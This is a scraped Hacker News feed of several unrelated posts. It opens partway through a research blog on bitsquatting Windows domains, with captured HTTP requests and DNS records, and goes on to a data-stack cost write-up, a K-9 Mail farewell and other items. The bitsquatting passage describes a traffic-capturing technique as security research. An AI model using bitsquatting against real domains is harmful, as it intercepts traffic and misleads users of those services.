    No active DNS record exists for the correct domain sg2p.w.s.windows.com

    However, the User-Agent and timing of requests suggest that this activity is directly linked to the same application that generated the traffic shown below for client.wns.windows.com and skydrive.wns.windows.com

    GET / HTTP/1.1
    Host: sg2p.w.s.windo7s.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 client.wns.windows.com

    These appear to be directly related to Windows Push Notification Services (WNS), which enables third-party developers to send toast, tile, badge, and raw updates from their own cloud service. The DNS record is a CNAME to wns.notify.trafficmanager.net

    DNS Records:

    client.wns.windows.com.        IN    CNAME   wns.notify.trafficmanager.net.
    wns.notify.trafficmanager.net. IN    A       52.177.166.224
    

    HTTP Request:

    GET / HTTP/1.1
    Host: client.wns.wkndows.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 skydrive.wns.windows.com

    Skydrive is what OneDrive was called before its name change.

    DNS Records:

    skydrive.wns.windows.com.      IN      CNAME   client.wns.windows.com.
    client.wns.windows.com.        IN      CNAME   wns.notify.trafficmanager.net.
    wns.notify.trafficmanager.net. IN      A       52.179.224.121
    

    HTTP Request:

    GET / HTTP/1.1
    Host: skydrive.wns.windo7s.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
    Accept: */*
    

    HTTP TCP port 80 time.windows.com

    I have no idea where the hell this request came from or why they were fetching HTTP from a server that should be an NTP server. WHOIS for the IP that made this request is shown below:

    inetnum:        123.112.0.0 - 123.127.255.255
    netname:        UNICOM-BJ
    descr:          China Unicom Beijing province network
    descr:          China Unicom
    country:        CN
    admin-c:        CH1302-AP
    tech-c:         SY21-AP
    mnt-by:         APNIC-HM
    mnt-lower:      MAINT-CNCGROUP-BJ
    mnt-routes:     MAINT-CNCGROUP-RR
    mnt-irt:        IRT-CU-CN
    
    GET / HTTP/1.1
    Host: time.wiodows.com
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
    Accept-Encoding: gzip
    Accept-Language: zh-cn,zh-tw
    Accept: */*
    

    Even stranger, shortly after the above request occurred, this happened! Baidu is one of China's largest search engines. Keep in mind that I configured my DNS servers to resolve in wildcard mode. There are only a small number of ways Baiduspider could know that time.wiodows.com existed, especially considering that only a single request had ever been made for this domain previously (seen above).

    GET / HTTP/1.1
    Host: time.wiodows.com
    Connection: close
    User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
    Accept-Encoding: gzip
    Accept-Language: zh-cn,zh-tw
    Accept: */*
    

    HTTP tcp port 80 windows.com/stopcode

    When you get a blue screen of death on Windows, you are prompted to visit https://www.windows.com/stopcode. Naturally, as the computer has crashed, you can't just open the link. Most people would probably just scan the QR code, but those who misspell things ended up here.

    GET /stopcode HTTP/1.1
    Host: wildows.com
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; ALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.111 Mobile Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    

    The following request was particularly interesting. Due to the nature of the request, I’m going to be very general with some details or censor entirely because it’s not exactly clear what’s going on.

    An IP from somewhere in the range 113.96.0.0 - 113.111.255.255 (CHINANET-GD) makes a request from an android phone.

    GET /topode HTTP/1.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Linux; Android 7.1.2; M6 Note Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.120 MQQBrowser/6.2 TBS/045223 Mobile Safari/537.36 MMWEBID/9551 MicroMessenger/7.0.14.1660(0x27000E37) Process/tools NetType/4G Language/zh_CN ABI/arm64 WeChat/arm64 wechatdevtools
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US
    Host: wintows.com
    Via: 1.1 TENCENT64.site (squid/3.5.20)
    X-Forwarded-For: <Department of Defence IP>
    Cache-Control: max-age=259200
    Connection: keep-alive
    

    It would appear that some user in China is using squid to inject HTTP headers into every request originating on their network, including from their mobile phone. Their computer gets a BSOD, so they try to look up the stopcode at windows.com/stopcode on their phone. They mistype the URL and end up at my server, where we can see that they're injecting an X-Forwarded-For HTTP header that attempts to make the request appear as if it originated from an IP belonging to the US Department of Defense.

    When I looked up the source IP on GreyNoise it showed that “This IP address has been opportunistically scanning the Internet, and has completed a full TCP connection. Reported activity could not be spoofed. This IP address has been observed by GreyNoise scanning the Internet on the following ports: 443 / TCP”

    Seeing as how my traffic was received on 80 / TCP, this seems like it may be something they did not intend to do.

    HTTP TCP port 80 windows.com/?fbclid

    As is expected, someone on Facebook is going to misspell windows.com, which will create a link with a unique token ?fbclid=xyz. Facebook's crawler will attempt to fetch it, and Bing will attempt to fetch it as well (and translate it, if it is in another language).

    GET /?fbclid=IwAR28VIBcDUlzO4XQOk9R-EWYLsnjUf-SrrKKZyAdOvrV2Mtv5JoJVO3PSUQ HTTP/1.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Host: wintows.com
    Connection: keep-alive
    

    It should come as no surprise that the NTP service, which runs on all Windows machines worldwide with a default configuration using time.windows.com, generated the most bit-flipped traffic. I still got a lot of traffic for other items as well. I was most surprised by just how much traffic I got from domains that were misspelled by users when typing a URL.

    Takeaways:

• Bitsquatting a heavily trafficked domain is still very practical to pull off.
    • Automated services that are integrated into an OS create a lot of bitsquatted traffic.
    • Users still misspell domains, a lot.
    ]]>
    https://remyhax.xyz/posts/bitsquatting-windows/ hacker-news-small-sites-43197132 Thu, 27 Feb 2025 18:42:03 GMT
    <![CDATA[Building a Modern Data Stack: Our 70% Cost Reduction with Open Source]]> thread link) | @jchandra
    February 27, 2025 | http://jchandra.com/posts/data-infra/ | archive.org

Building and managing a data platform that is both scalable and cost-effective is a challenge many organizations face. We managed an extensive data lake with a lean data team and reduced our infrastructure cost by 70%.

    This article explores how we built it and the lessons we learned. Hopefully, some of these insights will be useful (or at least interesting!) for your own data platform projects, regardless of your team size.

    Our Data Landscape#

We are a fintech startup helping SMEs raise capital through our platform, offering diverse financial products ranging from Term Loans and Revenue-Based Financing to Syndication. This breadth creates one unique data challenge: our data comes from everywhere.

    Our clients often manage their financial information in different ways, leading to data sources ranging from the structured data in our MongoDB and PostgreSQL databases to the semi-structured data found in marketplaces, Google Sheets, and various payment platforms.

Storing the data was only part of the equation. We needed to process and analyze it at scale, transforming it into actionable intelligence that drives key business decisions. Our data and BI analysts play a crucial role in this process, requiring robust data tooling to effectively access, analyze, and visualize the data. From lead generation and risk analysis to payment alerting and reconciliation, data is at the heart of our operations, and our data platform needs to support these critical workflows throughout the entire application lifecycle.

    Our Initial Data Platform#

    Initial Data Platform

    Our initial data platform was built on a foundation of tools that addressed our early-stage needs, but quickly became insufficient as we scaled. Data ingestion was primarily handled by Hevo, which leveraged Debezium Slots for capturing CDC events from our databases and direct integration with Google Sheets. While Hevo simplified initial data capture, its data transformation capabilities were limited, primarily offering basic functionality like data key deletion and value formatting.

Revenue data from marketplaces was ingested through an RPA-driven process, with data being ingested directly into Google BigQuery (GBQ) as raw dumps. While this approach was simpler, it came with high costs, as GBQ is priced based on the amount of data queried. Given that individual tables were on the order of 200-500 GB, the costs quickly escalated.

    Furthermore, a significant portion of queries were executed directly against our live OLTP tables. This direct querying increased the load on our production databases, impacting performance and further contributing to cost increases.

In the early days, with a smaller team and less data, these engineering decisions were pragmatic and likely solved the immediate problems. However, as our company grew and data demands increased, it became clear that this solution was not scalable and could not meet our evolving requirements. This realization led to the creation of a new data team, with myself and my manager, Aankesh, tasked with building a more robust and scalable data platform. We needed a platform that could handle the volume, variety, and complexity of our data, while also providing the necessary tools for efficient analysis and decision-making.

    Our New Data Platform#

    We implemented an ELT stack for our new data platform, leveraging cheap storage to prioritize raw data ingestion and subsequent in-warehouse transformations. We also strategically reused existing software components where they weren’t being fully utilized, further optimizing our development efforts.

    The platform’s development was segmented into two layers: Data Ingestion and Storage & Compute.

    Data Ingestion Layer#

    Data Ingestion
    • Debezium: Implemented for capturing CDC events from PostgreSQL and MongoDB, enabling real-time data replication.
    • Airflow: Utilized to orchestrate manual data ingestion from sources like Google Sheets and CSV files.
• Kafka & Kafka Connect:
  • Formed the core of our streaming data pipeline.
  • Leveraged custom Single Message Transforms (SMTs) for specialized transformations.
  • Self-managed and hosted the Kafka Connect cluster for fine-grained control.
  • Utilized managed Confluent Cloud for the Kafka brokers themselves, reusing the existing infrastructure that already served our application pub-sub systems.
• Sink Connectors: Employed Kafka Connect Sink Connectors to deliver data to downstream destinations (a registration sketch follows this list), including:
      • File storage (S3).
      • PostgreSQL for data replication.
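
As an illustration of the sink side, below is a hedged sketch of registering an S3 sink connector through the Kafka Connect REST API. The connector class and property names are Confluent's standard S3 sink options, but the topic, bucket, region, and host are hypothetical, and in practice the Parquet format also needs a schema-aware converter (e.g. Avro) configured.

import json
import requests  # assumes the Connect REST API is reachable at the URL below

# Hypothetical names: the topic, bucket, region, and host are illustrative only.
connector = {
    "name": "raw-loans-s3-sink",
    "config": {
        "connector.class": "io.confluent.connect.s3.S3SinkConnector",
        "topics": "cdc.postgres.public.loans",
        "storage.class": "io.confluent.connect.s3.storage.S3Storage",
        "format.class": "io.confluent.connect.s3.format.parquet.ParquetFormat",
        "s3.bucket.name": "datalake-raw",
        "s3.region": "ap-south-1",
        "flush.size": "10000",
        # Daily partitions keep downstream scans (dbt, Trino, DuckDB) cheap.
        "partitioner.class": "io.confluent.connect.storage.partitioner.TimeBasedPartitioner",
        "path.format": "'dt'=yyyy-MM-dd",
        "partition.duration.ms": "86400000",
        "timestamp.extractor": "Record",
        "locale": "en-US",
        "timezone": "UTC",
    },
}

resp = requests.post(
    "http://connect.internal:8083/connectors",
    headers={"Content-Type": "application/json"},
    data=json.dumps(connector),
)
resp.raise_for_status()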

    Storage & Compute Layer#

    Data Processing
    • Data Storage
      • All raw data, ingested from our diverse sources, is persisted in file storage (S3) in Parquet format. This choice offers significant advantages: Parquet’s columnar storage optimizes query performance, and S3 provides cost-effective and highly durable storage.
    • Data Transformation and Quality
      • Airflow orchestrates dbt runs, enabling us to build modular, testable, and maintainable data transformation pipelines. dbt’s transformation logic, expressed as SQL, simplifies the process and allows for version control.
      • Great Expectations is integrated into our pipelines to ensure comprehensive data validation checks at every stage. This helps us detect and address data quality issues early, preventing downstream errors.
  • dbt docs provide documentation and data lineage tracking, helping downstream consumers discover and understand the datasets we curate for them.
    • Ad-Hoc Analysis
  • Depending on dataset size and query patterns, we also leverage DuckDB for ad-hoc analysis and rapid prototyping. DuckDB's in-process, embeddable nature allows for fast, interactive querying, particularly for smaller datasets or exploratory analysis (see the sketch after this list).
    • Medallion Architecture: Organizing Data for Consumption
      • We implemented a medallion architecture (Bronze, Silver, Gold) to organize our data for optimal consumption.
      • The Bronze layer stores raw data, the Silver layer contains cleaned and conformed data, and the Gold layer provides business-ready datasets.
      • The Gold layer is further refined to create fine-grained datasets tailored to specific data access patterns. This approach minimizes data scanning during queries, significantly optimizing query performance, especially for frequently accessed data.
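
For the ad-hoc path, here is a minimal sketch of what a DuckDB session against the Parquet lake can look like. The httpfs extension and read_parquet are standard DuckDB features; the bucket, partition layout, and column names are hypothetical.

import duckdb

con = duckdb.connect()              # in-process: no server to provision or manage
con.execute("INSTALL httpfs;")      # adds S3 support
con.execute("LOAD httpfs;")
con.execute("SET s3_region = 'ap-south-1';")  # credentials come from the environment

# Scan only one day's partition of the (hypothetical) Silver layer.
df = con.execute("""
    SELECT product_type, count(*) AS loans, sum(amount) AS volume
    FROM read_parquet('s3://datalake-silver/loans/dt=2024-06-01/*.parquet')
    GROUP BY product_type
    ORDER BY volume DESC
""").df()  # returns a pandas DataFrame
print(df)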

    To enable efficient data discovery and querying:

    • Data Discovery: Data Indexing and Metastore
      • AWS Glue crawlers automatically index data in S3, updating metadata as new data arrives.
      • The AWS Glue Data Catalog serves as our Hive Metastore, providing a centralized repository for metadata. This allows Trino to efficiently locate and access data across our data lake.
    • Querying and Visualization
  • Trino is integrated with the Hive Metastore for distributed querying, enabling us to query data across our data lake using standard SQL (a client sketch follows this list). Trino's ability to federate queries across multiple data sources provides flexibility.
      • Metabase is linked to Trino, providing a user-friendly data visualization layer. This empowers our data and BI teams to create interactive reports and dashboards, driving data-driven decisions throughout the organization.
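
On the querying side, a hedged sketch of hitting Trino over the Glue-backed Hive catalog with the standard trino Python client; the coordinator host, user, and table name are hypothetical.

import trino  # pip install trino

conn = trino.dbapi.connect(
    host="trino.internal",  # hypothetical coordinator host
    port=8080,
    user="analyst",
    catalog="hive",         # resolved through the Glue Data Catalog metastore
    schema="gold",
)
cur = conn.cursor()
cur.execute("""
    SELECT dt, sum(volume) AS daily_volume
    FROM loan_metrics  -- hypothetical Gold-layer table
    GROUP BY dt
    ORDER BY dt DESC
    LIMIT 30
""")
for row in cur.fetchall():
    print(row)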

    Analyzing the Cost Reduction#

    Our cost reduction was realized through maximizing the utilization of our current infrastructure and transitioning away from expensive managed services.

Old Data Platform        New Architecture
Hevo: ~$300-500          Connect Cluster: ~$150
GBQ: ~$750               Airflow: ~$160
Postgres: ~$1000         Trino: ~$160
                         Glue: ~$10
Total: ~$2200 *          Total: ~$460 *

* All costs are monthly.


    Acknowledgments#

I would like to thank my stunning data team, and our managers Aankesh, Deepak, and Prashant for enabling the team.

    ]]>
    http://jchandra.com/posts/data-infra/ hacker-news-small-sites-43197102 Thu, 27 Feb 2025 18:38:49 GMT
    <![CDATA[Show HN: Compiler Playground for energy-efficient embedded dataflow processor]]> thread link) | @keyi
    February 27, 2025 | https://www.efficient.computer/resources/effcc-compiler-playground-launch | archive.org

    We’re excited to announce the official launch of our effcc Compiler Playground, a new, interactive software ecosystem for our processor. For the first time, developers can now sign up to experience the performance of our breakthrough processor architecture and see first-hand how it can offer orders of magnitude greater energy efficiency.

    As developers ourselves, we have experienced the frustrations of compiler friction and complexity. The effcc Compiler Playground was created to offer an interactive first look at our compiler and demonstrate how code is distributed and executed on the Fabric architecture. Just write or copy and paste C code into the Playground and the effcc Compiler automatically maps your code onto the Efficient dataflow architecture, identifying the most energy-efficient and performant representation for the Efficient Fabric. The visualization shows how your code is distributed to the tiles of the Fabric - the core architecture of the processor. Additionally, the Playground highlights the execution flow of the code, cycle-to-cycle, illuminating each operation tile-to-tile. 

    The Playground also presents a debugger feature, which enables developers to see placement and routes at a more granular level. By zeroing in on specific tiles, users are provided with a more detailed look at how operations will function on the Efficient processor. This enables developers to quickly and intuitively optimize the performance of their code for the processor.

    Finally, the Playground also offers visual energy estimates of battery life for a given application. This allows users to get a sense of the orders of magnitude improvement in energy efficiency when running an application on our Fabric processor compared to other processors available on the market today. The populated graph illustrates how much longer an application can run (in years) with our processor versus the alternatives.

    We’re thrilled to share this first look at the Efficient processor architecture’s class-defining efficiency and exceptional developer experience. We’re committed to empowering our community with the necessary tools to push the boundaries of efficiency, while creating innovative, general-purpose computing applications. Please apply for our Early Access Program for the Playground to experience the benefits first hand. 

    ]]>
    https://www.efficient.computer/resources/effcc-compiler-playground-launch hacker-news-small-sites-43197100 Thu, 27 Feb 2025 18:38:47 GMT
    <![CDATA[How to Learn Statistics]]> thread link) | @lakesare
    February 27, 2025 | https://page.brick.do/how-to-learn-statistics-w06NrnP3j0L3 | archive.org

    Tl;dr: you can't. 

    Just kidding, but this will be a short read, so you won't need a tl;dr. 

    You can't learn statistics, because the kind of statistics you are probably interested in learning is not really a scientific discipline, let alone a branch of mathematics. It's a craft, like surgery. You do need to learn some basic anatomy (random variables, hypothesis testing, etc.), but these concepts won't become intuitive until you start practicing. 

    The best way to master a craft is through apprenticeship. Take any statistics 101 course and look for a research internship. Most labs do statistics at some point or another. Make sure there is actually somebody in the lab who knows statistics well, though they don't necessarily need to be a statistician.  

    Once you start reading on how to do the thing your senior colleague told you to do, you will encounter terminology that sounds like everyday language but has specific, often unintuitive definitions in the context of statistics. If you're not familiar with those definitions, you will find yourself re-reading the same sentence multiple times, wondering why it doesn't make sense. 

    Case in point

    The trick is to treat each word as a potential technical term, and look up each one to make sure you understand it fully. Spaced repetition will speed up this process a lot.

    As a concluding remark, ChatGPT agreeing with my analogy:

    New "consult your physician" just dropped
    ]]>
    https://page.brick.do/how-to-learn-statistics-w06NrnP3j0L3 hacker-news-small-sites-43197064 Thu, 27 Feb 2025 18:35:00 GMT
    <![CDATA[Game to Detect Audio Deepfakes]]> thread link) | @muellern
    February 27, 2025 | https://deepfake-total.com/spot_the_deepfake/ | archive.org

    Unable to retrieve article]]>
    https://deepfake-total.com/spot_the_deepfake/ hacker-news-small-sites-43196941 Thu, 27 Feb 2025 18:22:23 GMT
    <![CDATA[Program-Analysis-Reading-List]]> thread link) | @nill0
    February 27, 2025 | https://www.msreverseengineering.com/program-analysis-reading-list | archive.org

    Computer Science:

    Mathematics:  I was advantaged in that I did my undergraduate degree in the subject. Here's what I can recommend, given eleven years' worth of hindsight studying program analysis:

• You run into abstract algebra a lot in program analysis as well as in cryptography, so it's best to begin with a solid foundation along those lines. There's a lot of debate as to what the best text is. If you've never touched the subject before, Gallian is very approachable, if not as deep and rigorous as something like Dummit and Foote.
    • Order theory is everywhere in program analysis. Introduction to Lattices and Order is the standard (read at least the first two chapters; the more you read, the better), but I recently picked up Lattices and Ordered Algebraic Structures and am enjoying it.
    • Complexity theory. Arora and Barak is recommended.
    • Formal logic is also everywhere. For this, I recommend the first few chapters in The Calculus of Computation (this is an excellent book; read the whole thing).
• Computability, undecidability, etc. Not entirely separate from previous entries, but read something that treats e.g. Goedel's theorems, for instance The Undecidable.
    • Decision procedures. Read Decision Procedures.
    • For an extensive treatment of SAT solvers and their applications, read Handbook of Satisfiability.  For something math-ier, try Introduction to the Mathematics of Satisfiability.
    • I wish I had studied set theory sooner in my program analysis career. Many concepts from set theory recur in abstract interpretation -- and they're harder in set theory, so if you study that first, you will have a solid background for reading abstract interpretation. A good treatment of set theory will utilize partial orderings, descending and ascending chain conditions, ordinal theory, definition by transfinite recursion, and some fixedpoint theorems. I used Set Theory and the Continuum Problem, and recommend it for its exposition (while lamenting its many typographical errors).

    Program analysis, the "accessible" variety.

    Program analysis, the "serious" variety. 

• Principles of Program Analysis is an excellent book, but you'll find it very difficult even if you understand all of the above. Similarly, Cousot's MIT lecture course is great but largely unapproachable to the beginner. I highly recommend Value-Range Analysis of C Programs, which is a rare and thorough glimpse into the development of an extremely sophisticated static analyzer. Although this book is heavily mathematical, it's substantially less insane than Principles of Program Analysis. I also found Gogul Balakrishnan's Ph.D. thesis, Johannes Kinder's Ph.D. thesis, Mila Dalla Preda's Ph.D. thesis, Antoine Mine's Ph.D. thesis, and Davidson Rodrigo Boccardo's Ph.D. thesis useful.
• If you've gotten to this point, you'll probably begin to develop a very selective taste for program analysis literature: in particular, if it does not have a lot of mathematics (actual math, not just simple concepts formalized), you might decide that it is unlikely to contain a lasting and valuable contribution. At this point, read papers from CAV, SAS, and VMCAI. Some of my favorite researchers are the Z3 team, Mila Dalla Preda, Joerg Brauer, Andy King, Axel Simon, Roberto Giacobazzi, and Patrick Cousot.
    • Although I've tried to lay out a reasonable course of study hereinbefore regarding the mathematics you need to understand this kind of material, around this point in the course you'll find that the creature we're dealing with here is an octopus whose tentacles spread in every direction. In particular, you can expect to encounter topology, category theory, tropical geometry, numerical mathematics, and many other disciplines. Program analysis is multi-disciplinary and has a hard time keeping itself shoehorned in one or two corners of mathematics.
• After several years of wading through program analysis, you start to understand that there must be some connection between theorem-prover based methods and abstract interpretation, since after all, they both can be applied statically and can potentially produce similar information. But what is the connection? Recent publications by Vijay D'Silva et al (1, 2, 3, 4, 5) and a few others (1, 2, 3, 4) have begun to plough this territory.

    Final bit of advice: you'll notice that I heavily stuck to textbooks and Ph.D. theses in the above list. I find that jumping straight into the research literature without a foundational grounding is perhaps the most ill-advised mistake one can make intellectually. To whatever extent that what you're interested in is systematized -- that is, covered in a textbook or thesis already, you should read it before digging into the research literature. Otherwise, you'll be the proverbial blind man with the elephant, groping around in the dark, getting bits and pieces of the picture without understanding how it all forms a cohesive whole. I made that mistake and it cost me a lot of time; don't do the same.

    ]]>
    https://www.msreverseengineering.com/program-analysis-reading-list hacker-news-small-sites-43196903 Thu, 27 Feb 2025 18:17:39 GMT
    <![CDATA[ADHD Guide to Spaced Repetition]]> thread link) | @lakesare
    February 27, 2025 | https://page.brick.do/adhd-guide-to-spaced-repetition-4ja9ZO4DXLM2 | archive.org

    Unable to retrieve article]]>
    https://page.brick.do/adhd-guide-to-spaced-repetition-4ja9ZO4DXLM2 hacker-news-small-sites-43196788 Thu, 27 Feb 2025 18:04:15 GMT
    <![CDATA[Stripe Annual Letter [pdf]]]> thread link) | @charlieirish
    February 27, 2025 | https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf | archive.org

Unable to retrieve article]]>

    Article truncated for RSS feed. Read the full article at https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf

    ]]>
    https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf hacker-news-small-sites-43196735 Thu, 27 Feb 2025 17:59:37 GMT
    <![CDATA[A love letter to Opera Mini]]> thread link) | @panstromek
    February 27, 2025 | https://yoyo-code.com/love-letter-to-opera-mini/ | archive.org

    Unable to retrieve article]]>
    https://yoyo-code.com/love-letter-to-opera-mini/ hacker-news-small-sites-43196634 Thu, 27 Feb 2025 17:47:58 GMT
    <![CDATA[Tokyo court upholds suspended jail term for former Nissan exec]]> thread link) | @PaulHoule
    February 27, 2025 | https://www.japantimes.co.jp/news/2025/02/04/japan/crime-legal/nissan-kelly-high-court-ruling/ | archive.org

    Unable to retrieve article]]>
    https://www.japantimes.co.jp/news/2025/02/04/japan/crime-legal/nissan-kelly-high-court-ruling/ hacker-news-small-sites-43196506 Thu, 27 Feb 2025 17:33:25 GMT
    <![CDATA[Goodbye K-9 Mail]]> thread link) | @todsacerdoti
    February 27, 2025 | https://cketti.de/2025/02/26/goodbye-k9mail/ | archive.org

    TL;DR: I quit my job working on Thunderbird for Android and K-9 Mail at MZLA.

My personal journey with K-9 Mail started in late 2009, shortly after getting my first Android device. The pre-installed Email app didn’t work very well with my email provider. When looking for alternatives, I discovered K-9 Mail. It had many of the same issues. But it was an active open source project that accepted contributions. I started fixing the problems I was experiencing and contributed these changes to K-9 Mail. It was a very pleasant experience and so I started fixing bugs reported by other users.

In February 2010, Jesse Vincent, the founder of the K-9 Mail project, offered me commit access to the Subversion repository. According to my email archive, I replied with the following text:

    Thank you! I really enjoyed writing patches for K-9 and gladly accept your offer. But I probably won’t be able to devote as much time to the project as I do right now for a very long time. I hope that’s not a big problem.

    My prediction turned out to be not quite accurate. I was able to spend a lot of time working on K-9 Mail and quickly became one of the most active contributors.

    In 2012, Jesse hired me to work on Kaiten Mail, a commercial closed-source fork of K-9 Mail. The only real differences between the apps were moderate changes to the user interface. So most of the features and bug fixes we created for Kaiten Mail also went into K-9 Mail. This was important to me and one of the reasons I took the job.

In early 2014, Jesse made me the K-9 Mail project leader. With Kaiten Mail, end-user support was eating up a lot of time and, eventually, the motivation to work on the app. So we stopped working on it around the same time and the app slowly faded away.

To pay the bills, I started working as a freelance Android developer. Maybe not surprisingly, more often than not I was contracted to work on email clients. Whenever I was working on a closed source fork of K-9 Mail, I had a discounted hourly rate that would apply when working on things that were contributed to K-9 Mail. This was mostly bug fixes, but also the odd feature every now and then.

After a contract ended in 2019, I decided to apply for a grant from the Prototype Fund to work on adding JMAP support to K-9 Mail. This allowed me to basically work full-time on the project. When the funding period ended in 2020, the COVID-19 pandemic was in full swing. At that time I didn’t feel like looking for a new contract. I filled my days working on K-9 Mail to mute the feeling of despair about the world. I summarized my 2020 in the blog post My first year as a full-time open source developer.

    Eventually I had to figure out how to finance this full-time open source developer lifestyle. I ended up asking K-9 Mail users to donate so I could be paid to dedicate 80% of my time to work on the app. This worked out quite nicely and I wrote about it here: 2021 in Review.

I first learned about plans to create a Thunderbird version for Android in late 2019. I was approached because one of the options considered was basing Thunderbird for Android on K-9 Mail. At the time, I wasn’t really interested in working on Thunderbird for Android. But I was more than happy to help turn the K-9 Mail code base into something that Thunderbird could use as a base for their own app. However, it seemed the times when we had availability to work on such a project never aligned. And so nothing concrete happened. But we stayed in contact.

    In December 2021, it seemed to have become a priority to find a solution for the many Thunderbird users asking for an Android app. By that time, I had realized that funding an open source project via donations requires an ongoing fundraising effort. Thunderbird was already doing this for quite some time and getting pretty good at it. I, on the other hand, was not looking forward to the idea of getting better at fundraising.
    So, when I was asked again whether I was interested in K-9 Mail and myself joining the Thunderbird project, I said yes. It took another six months for us to figure out the details and announce the news to the public.

Once under the Thunderbird umbrella, we worked on adding features to K-9 Mail that we wanted an initial version of Thunderbird for Android to have. The mobile team slowly grew to include another Android developer, then a manager. While organizationally the design team was its own group, there was always at least one designer available to work with the mobile team on the Android app. And then there were a bunch of other teams to do the things for which you don’t need Android engineers: support, communication, donations, etc.

    In October 2024, we finally released the first version of Thunderbird for Android. The months leading up to the release were quite stressful for me. All of us were working on many things at the same time to not let the targeted release date slip too much. We never worked overtime, though. And we got additional paid time off after the release ❤️

After a long vacation, we started 2025 with a more comfortable pace. However, the usual joy I felt when working on the app didn’t return. I finally realized this at the beginning of February, while being sick in bed and having nothing better to do than contemplate life.
I don’t think I was close to burnout – work wasn’t that much fun anymore, but it was far from unbearable. I’ve been there before. And in the past it was never a problem to step away from K-9 Mail for a few months. However, it’s different when it’s your job. But since I am in the very fortunate position of being able to afford taking a couple of months off, I decided to do just that. So the question was whether to take a sabbatical or to quit.
    Realistically, permanently walking away from K-9 Mail never was an option in the past. There was no one else to take over as a maintainer. It would have most likely meant the end of the project. K-9 Mail was always too important to me to let that happen.
    But this is no longer an issue. There’s now a whole team behind the project and me stepping away no longer is an existential threat to the app.

    I want to explore what it feels like to do something else without going back to the project being a foregone conclusion. That is why I quit my job at MZLA.

    It was a great job and I had awesome coworkers. I can totally recommend working with these people and will miss doing so 😢


    I have no idea what I’ll end up doing next. A coworker asked me whether I’ll stick to writing software or do something else entirely. I was quite surprised by this question. Both because in hindsight it felt like an obvious question to ask and because I’ve never even considered doing something else. I guess that means I’m very much still a software person and will be for the foreseeable future.

    During my vacation I very much enjoyed being a beginner and learning about technology I haven’t worked with as a developer before (NFC smartcards, USB HID, Bluetooth LE). So I will probably start a lot of personal projects and finish few to none of them 😃

    I think there’s a good chance that – after an appropriately sized break – I will return as a volunteer contributor to K-9 Mail/Thunderbird for Android.

    But for now, I say: Goodbye K-9 Mail 👋


    This leaves me with saying thank you to everyone who contributed to K-9 Mail and Thunderbird for Android over the years. People wrote code, translated the app, reported bugs, helped other users, gave money, promoted the app, and much more. Thank you all 🙏


    ]]>
    https://cketti.de/2025/02/26/goodbye-k9mail/ hacker-news-small-sites-43196436 Thu, 27 Feb 2025 17:26:21 GMT
    <![CDATA[Cambridge initiative to address risks of future engineered pandemics]]> thread link) | @gnabgib
    February 27, 2025 | https://www.cam.ac.uk/research/news/cambridge-initiative-to-address-risks-of-future-engineered-pandemics | archive.org

    These are some of the questions being addressed by a new initiative launched today at the University of Cambridge, which seeks to address the urgent challenge of managing the risks of future engineered pandemics.

    The Engineered Pandemics Risk Management Programme aims to understand the social and biological factors that might drive an engineered pandemic and to make a major contribution to building the UK’s capability for managing these risks. It will build a network of experts from academia, government, and industry to tackle the problem.

Increased security threats from state and non-state actors, combined with increased urbanisation and global mobility, mean the threat of deliberate pathogen release must be taken seriously, as must other intertwined aspects of pandemic risk such as mis- and disinformation, the erosion of trust in a number of institutions and an increasingly volatile geopolitical context. Further potential risks are posed by recent developments in gene-editing tools and artificial intelligence, which have rapidly advanced the technological capabilities that may make it easier to engineer potential pandemic pathogens.

    Professor Clare Bryant from the Department of Medicine at the University of Cambridge said: “There is a great opportunity to take a joined-up approach to managing the risks posed by engineered pandemics. We need experts and agencies across the spectrum to work together to develop a better understanding of who or what might drive such events and what their likely impact would be. And we need evidence-informed policies and networks in place that would help us respond to – or better still, prevent – such an eventuality.”

The aims of the Engineered Pandemics Risk Management Programme are:

• To develop the conceptual underpinnings for the risk management of engineered pandemics based on interdisciplinary research
• To support the capability of the UK’s engineered pandemic risk policy and practice, including building and maintaining networks that connect government, academia and industry
• To strengthen the international networks that will support this work globally

    There are four main strands of work:

    Social determinants of engineered pandemic threat

